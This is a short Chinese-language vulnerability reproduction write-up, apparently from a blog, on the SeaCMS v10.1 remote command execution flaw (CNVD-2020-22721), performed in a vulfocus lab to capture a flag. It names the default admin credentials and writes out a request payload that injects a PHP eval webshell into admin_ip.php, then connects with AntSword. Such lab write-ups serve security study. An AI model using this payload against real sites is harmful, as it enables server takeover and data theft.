漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

漏洞信息

  • seacms_v10.1有效
  • cnvd-2020-22721
  • 命令执行漏洞

描述

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

登录进入首页

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第1张图片

按照如图顺序访问,点击确认时抓包

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第2张图片

修改内容

v=0&ip=127.0.0.1";eval($_POST[999]);//

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第3张图片

网页回显正常没有报错

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第4张图片

尝试蚁剑连接

ip安全设置选项位置为admin_ip.php

访问也正常

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第5张图片

尝试蚁剑连接该位置

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第6张图片

成功获取flag

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)_第7张图片

你可能感兴趣的:(漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维)